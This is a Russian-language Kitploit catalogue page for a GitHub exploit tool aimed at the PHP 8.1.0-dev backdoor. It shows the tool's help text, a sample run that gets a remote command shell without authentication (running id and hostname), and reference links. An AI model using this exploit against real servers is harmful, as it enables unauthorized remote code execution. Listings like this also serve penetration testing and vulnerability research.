Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PHP-8.1.0-dev_WebShell-RCE — PHP 8.1.0-dev WebShell Remote Code Execution | Kitploit
Инструменты/GitHubGitHub/coldfusionx/php-8.1.0-dev_webshell-rce
ExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubcoldfusionx/php-8.1.0-dev_webshell-rce

PHP-8.1.0-dev_WebShell-RCE

PHP 8.1.0-dev WebShell Remote Code Execution

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
315 лет назадЕщё не проверено

PHP 8.1.0-dev WebShell RCE (без аутентификации)

Эксплойт-код для PHP 8.1.0-dev WebShell RCE (без аутентификации)

Ожидаемый результат: эксплуатация бэкдора, установленного на сервере под управлением PHP 8.1.0-dev, с получением WebShell для удалённого выполнения команд.

Предназначен только для образовательных целей и тестирования в корпоративных средах.

Этот эксплойт был протестирован на Python 3.8.6

Использование:

root@kitploit:~
cfx:  ~/Documents/
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL]

PHP 8.1.0-dev WebShell RCE by ColdFusionX

optional arguments:
  -h, --help         show this help message and exit
  -l URL, --url URL  PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)

Exploit Usage : 
./exploit.py -l http://127.0.0.1
[^] WebShell=- id
OR
[^] WebShell=- whoami

Аргументы пользователя:

Для первоначального запуска эксплойту требуется один аргумент:

  • -l : целевой URL PHP 8.1.0-dev

POC

  • Сценарий 1 : Действительно уязвимая цель
root@kitploit:~
cfx:  ~/Documents/
→ ./exploit.py -l http://127.0.0.1

[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX 
 
Target is running on PHP 8.1.0-dev

*Shoot your commands below* 

[^] WebShell=- id

uid=1000(cfx) gid=1000(cfx) groups=1000(cfx)

[^] WebShell=- hostname

shockwave

[^] WebShell=- ^C
Exiting.
  • Сценарий 2 : Недействительная цель
root@kitploit:~
cfx:  ~/Documents/
→ ./exploit.py -l http://127.0.0.1

[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX 
 
Invalid URL or Target Not Vulnerable

Ссылки

  • https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • https://news-web.net/php.internals/113838
  • https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
  • https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
Скачать инструмент